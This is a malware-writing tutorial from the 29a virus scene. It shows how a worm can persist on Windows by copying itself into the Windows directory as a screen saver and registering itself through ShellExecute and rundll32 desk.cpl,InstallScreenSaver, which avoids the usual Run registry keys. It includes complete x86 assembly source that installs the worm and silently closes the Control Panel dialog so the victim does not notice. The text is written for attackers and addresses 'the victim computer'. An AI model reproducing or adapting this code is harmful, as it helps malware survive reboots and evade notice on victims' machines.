_______________________________________________________________________ New way to startup files - ShellExecute InstallScreenSaver API By: SWaNk ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ ____________ Introduction ŻŻŻŻŻŻŻŻŻŻŻŻ Lo ppl, this is my first tutorial for 29a. First of all, fogive my terrible english i'm brazilian. In this article I'll explain how to install one screen saver in the victim computer. Why? Just because it can be used to startup worms/virii with out using the most common ways like "run" or "RunOnce". unchanging registry or ini flies. __________ Explaining ŻŻŻŻŻŻŻŻŻŻ A few days ago, I was walking inside my registry and i've found something that call my attention. [HKEY_CLASSES_ROOT\scrfile\shell\install\command] @="C:\\WINDOWS\\rundll32.exe desk.cpl,InstallScreenSaver %l" Well, i start to think.. rundll32.. scrfile.. InstallScreenSaver.. it should be used on ShellExecute API call! Now it's easy, just follow the steps: - Find the windows root - Create one .SCR file at windows root (it's just the basics, you can make it more interesting infecting all the .SCR files and choosing one at windows root to install randomly) - Call the API With this, if the screen saver run the worm will run too. If the user open the screen saver tab to change and click on the preview button it will run again.. think about the possibilities. Now it's with your sick mind.. PS: We have one small problem. When the worm call the API, it will open the screen saver window from Control Panel. You can leave it and let the user close the window or can use 2 APIs to close the fucking delator. See the sample source code above for details: ;______________________________________________________________________ ; example Source code ;ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ .386p .model FLAT extrn ExitProcess : PROC extrn ShellExecuteA : PROC extrn SetCurrentDirectoryA : PROC extrn GetWindowsDirectoryA : PROC extrn lstrcatA : PROC extrn MessageBoxA : PROC extrn CopyFileA : PROC extrn GetModuleFileNameA : PROC extrn PostMessageA : PROC extrn FindWindowA : PROC .data PropVideo db 'Propriedades de Vídeo',0 ;window title in portuguese Message db "running again..",0 open db "open",0 rundll32 db "rundll32.exe",0 InstallSS db "desk.cpl,InstallScreenSaver ",0 SSaver db "SWaNk.scr",0 .data? MainDir db 256 dup(?) WindowsDir db 256 dup(?) .code start: push 256 push offset MainDir push 0 call GetModuleFileNameA ;put the current directory in MainDir push 256 push offset WindowsDir call GetWindowsDirectoryA mov byte ptr [WindowsDir+eax], '\' ;put windows root in WindowsDir+\ push offset SSaver push offset WindowsDir call lstrcatA ;WindowsDir+SSaver push 1 push offset WindowsDir push offset MainDir call CopyFileA ;copy the worm to windows root push offset WindowsDir push offset InstallSS call lstrcatA ;InstallSS+WindowsDir push 1 push 0 push offset InstallSS push offset rundll32 push offset open push 0 call ShellExecuteA ; install the worm as screen saver search: mov eax, offset PropVideo ;window title change to your language push eax cdq ;EDX=0 push edx ;window class - NULL call FindWindowA xchg eax, ecx ;swap EAX with ECX jecxz search ;if ECX=0, don´t find then search again push edx push edx push 12h push ecx call PostMessageA ;send message to close the window. Tnx Benny! push 0 push offset Message push offset Message push 0 call MessageBoxA ;Just one message.. push 0 call ExitProcess ;piss off! end start ;______________________________________________________________________ ; -eof- ;ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ Well, thats all! I hope this article help you. cya! "Quem refresca cu de pato é lagoa.." (SWaNk)